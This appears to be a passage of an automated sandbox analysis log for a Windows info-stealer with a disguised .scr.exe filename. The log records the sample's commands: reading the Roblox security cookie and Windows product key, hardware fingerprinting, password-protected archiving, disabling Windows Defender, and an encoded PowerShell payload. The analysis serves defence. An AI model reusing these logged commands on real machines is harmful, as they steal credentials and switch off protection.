              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exe C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exe a -r -hp"adrik123adi" "C:\Users\user\AppData\Local\Temp\QzNtG.zip" *
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic os get Caption
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic computersystem get totalphysicalmemory
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend && powershell set-mppreference -submitsamplesconsent 2 & "%programfiles%\windows defender\mpcmdrun.exe" -removedefinitions -all"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell.exe -noprofile -executionpolicy bypass -encodedcommand jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaagacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiab1ahmaaqbuagcaiaaoaecacgbhahaaaabpagmacwagagcacgbhahaaaabpagmacwagad0aiabhahiayqbwaggaaqbjahmalgbgahiabwbtaekabqbhagcazqaoagiaaqb0ag0ayqbwackakqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8abqbtagmacgblaguabgaoag4azqb3acaauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazgb0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaacgblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiablahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmagkabgbpahqaaqbvag4aiaakahmabwb1ahiaywblacaalqbsaguazgblahiazqbuagmazqbkaeeacwbzaguabqbiagwaaqblahmaia
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -noprofile -executionpolicy bypass -encodedcommand jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaagacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiab1ahmaaqbuagcaiaaoaecacgbhahaaaabpagmacwagagcacgbhahaaaabpagmacwagad0aiabhahiayqbwaggaaqbjahmalgbgahiabwbtaekabqbhagcazqaoagiaaqb0ag0ayqbwackakqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8abqbtagmacgblaguabgaoag4azqb3acaauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazgb0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaacgblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiablahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmagkabgbpahqaaqbvag4aiaakahmabwb1ahiaywblacaalqbsaguazgblahiazqbuagmazqbkaeeacwbzaguabqbiagwaaqblahmaiab
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend && powershell set-mppreference -submitsamplesconsent 2 & "%programfiles%\windows defender\mpcmdrun.exe" -removedefinitions -all"Jump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell.exe -noprofile -executionpolicy bypass -encodedcommand jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaagacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiab1ahmaaqbuagcaiaaoaecacgbhahaaaabpagmacwagagcacgbhahaaaabpagmacwagad0aiabhahiayqbwaggaaqbjahmalgbgahiabwbtaekabqbhagcazqaoagiaaqb0ag0ayqbwackakqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8abqbtagmacgblaguabgaoag4azqb3acaauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazgb0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaacgblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiablahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmagkabgbpahqaaqbvag4aiaakahmabwb1ahiaywblacaalqbsaguazgblahiazqbuagmazqbkaeeacwbzaguabqbiagwaaqblahmaiaJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversendJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -noprofile -executionpolicy bypass -encodedcommand jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaagacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiab1ahmaaqbuagcaiaaoaecacgbhahaaaabpagmacwagagcacgbhahaaaabpagmacwagad0aiabhahiayqbwaggaaqbjahmalgbgahiabwbtaekabqbhagcazqaoagiaaqb0ag0ayqbwackakqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8abqbtagmacgblaguabgaoag4azqb3acaauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazgb0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaacgblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiablahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmagkabgbpahqaaqbvag4aiaakahmabwb1ahiaywblacaalqbsaguazgblahiazqbuagmazqbkaeeacwbzaguabqbiagwaaqblahmaiab
              Source: C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exeCode function: 68_2_00007FF7F7ECB340 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,68_2_00007FF7F7ECB340
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeCode function: 0_2_00007FF73AE39E40 cpuid 0_2_00007FF73AE39E40
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882\ucrtbase.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882\_ctypes.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882\base_library.zip VolumeInformationJump to behavior
